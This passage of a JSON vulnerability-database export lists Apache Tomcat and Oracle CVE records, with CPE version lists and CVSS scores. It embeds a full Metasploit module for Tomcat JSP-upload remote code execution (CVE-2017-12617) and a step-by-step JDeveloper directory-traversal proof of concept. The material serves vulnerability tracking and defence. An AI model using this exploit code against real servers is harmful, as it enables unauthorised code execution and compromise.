"cpe:/a:apache:tomcat:8.0.17", "cpe:/a:apache:tomcat:8.0.18", "cpe:/a:apache:tomcat:8.0.19", "cpe:/a:apache:tomcat:8.0.20", "cpe:/a:apache:tomcat:8.0.21", "cpe:/a:apache:tomcat:8.0.22", "cpe:/a:apache:tomcat:8.0.23", "cpe:/a:apache:tomcat:8.0.24", "cpe:/a:apache:tomcat:8.0.25", "cpe:/a:apache:tomcat:8.0.26", "cpe:/a:apache:tomcat:8.0.27", "cpe:/a:apache:tomcat:8.0.28", "cpe:/a:apache:tomcat:8.0.29", "cpe:/a:apache:tomcat:8.0.30", "cpe:/a:apache:tomcat:8.0.31", "cpe:/a:apache:tomcat:8.0.32", "cpe:/a:apache:tomcat:8.0.33", "cpe:/a:apache:tomcat:8.0.34", "cpe:/a:apache:tomcat:8.0.35", "cpe:/a:apache:tomcat:8.0.36", "cpe:/a:apache:tomcat:8.0.37", "cpe:/a:apache:tomcat:8.0.38", "cpe:/a:apache:tomcat:8.0.39", "cpe:/a:apache:tomcat:8.0.40", "cpe:/a:apache:tomcat:8.0.41", "cpe:/a:apache:tomcat:8.0.42", "cpe:/a:apache:tomcat:8.0.43", "cpe:/a:apache:tomcat:8.0.44", "cpe:/a:apache:tomcat:8.0.45", "cpe:/a:apache:tomcat:8.0.46", "cpe:/a:apache:tomcat:8.5.0", "cpe:/a:apache:tomcat:8.5.1", "cpe:/a:apache:tomcat:8.5.2", "cpe:/a:apache:tomcat:8.5.3", "cpe:/a:apache:tomcat:8.5.4", "cpe:/a:apache:tomcat:8.5.5", "cpe:/a:apache:tomcat:8.5.6", "cpe:/a:apache:tomcat:8.5.7", "cpe:/a:apache:tomcat:8.5.8", "cpe:/a:apache:tomcat:8.5.9", "cpe:/a:apache:tomcat:8.5.10", "cpe:/a:apache:tomcat:8.5.11", "cpe:/a:apache:tomcat:8.5.12", "cpe:/a:apache:tomcat:8.5.13", "cpe:/a:apache:tomcat:8.5.14", "cpe:/a:apache:tomcat:8.5.15", "cpe:/a:apache:tomcat:8.5.16", "cpe:/a:apache:tomcat:8.5.17", "cpe:/a:apache:tomcat:8.5.18", "cpe:/a:apache:tomcat:8.5.19", "cpe:/a:apache:tomcat:8.5.20", "cpe:/a:apache:tomcat:8.5.21", "cpe:/a:apache:tomcat:8.5.22", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0"], "id": "CVE-2017-12617", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12617", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.2:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.4:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.5:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.40:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.42:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.44:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.45:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.46:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.47:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.48:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.49:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.50:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.51:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.54:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.55:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.56:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.57:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.58:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.59:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.60:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.61:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.62:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.63:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.64:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.65:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.66:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.67:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.68:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.69:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.70:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.71:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.72:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.73:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.74:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.75:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.76:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.77:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.79:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.80:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.81:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc10:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.40:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.42:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.44:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.45:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.46:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone1:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone10:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone11:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone12:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone13:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone14:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone15:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone16:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone17:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone18:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone19:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone2:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone20:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone21:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone22:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone3:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone4:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone5:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone6:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone7:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone8:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone9:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-04-02T05:24:50", "description": "Exploit for java platform in category web applications", "cvss3": {}, "published": "2018-01-18T00:00:00", "type": "zdt", "title": "Oracle JDeveloper IDE Directory Traversal Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10273"], "modified": "2018-01-18T00:00:00", "id": "1337DAY-ID-29579", "href": "https://0day.today/exploit/description/29579", "sourceData": "[+] Credits: John Page (aka hyp3rlinx) \r\n\r\nVendor:\r\n=============\r\nwww.oracle.com\r\n\r\n\r\nProduct:\r\n===========\r\nJDeveloper IDE\r\n\r\nOracle JDeveloper is a free integrated development environment that simplifies the development of Java-based\r\napplications addressing every step of the application lifecycle.\r\n\r\n\r\n\r\nVulnerability Type:\r\n===================\r\nDirectory Traversal\r\n\r\n\r\n\r\nCVE Reference:\r\n==============\r\nCVE-2017-10273\r\n\r\n\r\n\r\nSecurity Issue:\r\n================\r\nAttackers can place malicious files outside intended target directories if tricked into importing corrupt .WAR or .EAR archives.\r\nLater, attackers can potentially request these scripts/files to execute system commands on affected target.\r\n\r\n\r\nAffected versions:\r\n11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.2.0\r\n\r\n\r\nReferences:\r\n============\r\nhttp://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\r\n\r\n\r\n\r\nExploit/POC:\r\n=============\r\n1) create evil .WAR or .EAR archive containing ../ in path name to initiate directory traversal and inside a script to execute system commands.\r\n2) import into JDeveloper\r\n3) files get moved outside target directories to one of the attackers choosing.\r\n4) attacker requests the malicious file contained in target directory.\r\n\r\nBAM!\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/29579", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-05T03:10:51", "description": "This Metasploit module uploads a jsp payload and executes it.", "cvss3": {}, "published": "2017-10-12T00:00:00", "type": "zdt", "title": "Apache Tomcat JSP Upload Bypass Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-12617"], "modified": "2017-10-12T00:00:00", "id": "1337DAY-ID-28780", "href": "https://0day.today/exploit/description/28780", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Tomcat RCE via JSP Upload Bypass',\r\n 'Description' => %q{\r\n This module uploads a jsp payload and executes it.\r\n },\r\n 'Author' => 'peewpw',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2017-12617' ],\r\n [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617' ],\r\n [ 'URL', 'https://bz.apache.org/bugzilla/show_bug.cgi?id=61542' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Platform' => %w{ linux win }, # others?\r\n 'Targets' =>\r\n [\r\n [ 'Automatic',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Java Windows',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Java Linux',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => 'Oct 03 2017',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, \"The URI path of the Tomcat installation\", \"/\"]),\r\n Opt::RPORT(8080)\r\n ])\r\n end\r\n\r\n def check\r\n testurl = Rex::Text::rand_text_alpha(10)\r\n testcontent = Rex::Text::rand_text_alpha(10)\r\n\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, \"#{testurl}.jsp/\"),\r\n 'method' => 'PUT',\r\n 'data' => \"<% out.println(\\\"#{testcontent}\\\");%>\"\r\n })\r\n\r\n res1 = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, \"#{testurl}.jsp\"),\r\n 'method' => 'GET'\r\n })\r\n\r\n if res1 && res1.body.include?(testcontent)\r\n send_request_cgi(\r\n opts = {\r\n 'uri' => normalize_uri(target_uri.path, \"#{testurl}.jsp/\"),\r\n 'method' => 'DELETE'\r\n },\r\n timeout = 1\r\n )\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n print_status(\"Uploading payload...\")\r\n testurl = Rex::Text::rand_text_alpha(10)\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, \"#{testurl}.jsp/\"),\r\n 'method' => 'PUT',\r\n 'data' => payload.encoded\r\n })\r\n if res && res.code == 201\r\n res1 = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, \"#{testurl}.jsp\"),\r\n 'method' => 'GET'\r\n })\r\n if res1 && res1.code == 200\r\n print_status(\"Payload executed!\")\r\n else\r\n fail_with(Failure::PayloadFailed, \"Failed to execute the payload\")\r\n end\r\n else\r\n fail_with(Failure::UnexpectedReply, \"Failed to upload the payload\")\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-02-05] #", "sourceHref": "https://0day.today/exploit/28780", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "prion": [{"lastseen": "2023-11-22T02:57:35", "description": "Vulnerability in the Oracle Access Manager component of Oracle Fusion Middleware (subcomponent: Web Server Plugin). The supported version that is affected is 11.1.2.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Access Manager accessible data. CVSS 3.0 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-18T02:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10262"], "modified": "2018-01-25T13:52:00", "id": "PRION:CVE-2017-10262", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-10262", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T02:57:36", "description": "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Deployment). Supported versions that are affected are 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.2.0. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper. CVSS 3.0 Base Score 4.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L).", "cvss3": {"exploitabilityScore": 0.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.7}, "published": "2018-01-18T02:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.7, "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10273"], "modified": "2018-01-25T13:52:00", "id": "PRION:CVE-2017-10273", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-10273", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T02:57:46", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services). The supported version that is affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 9.9, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.3}, "published": "2017-10-19T17:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10352"], "modified": "2019-10-03T00:03:00", "id": "PRION:CVE-2017-10352", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-10352", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T02:57:13", "description": "Vulnerability in the Oracle Business Intelligence Enterprise Edition component of Oracle Fusion Middleware (subcomponent: Analytics Web Dashboards). The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence 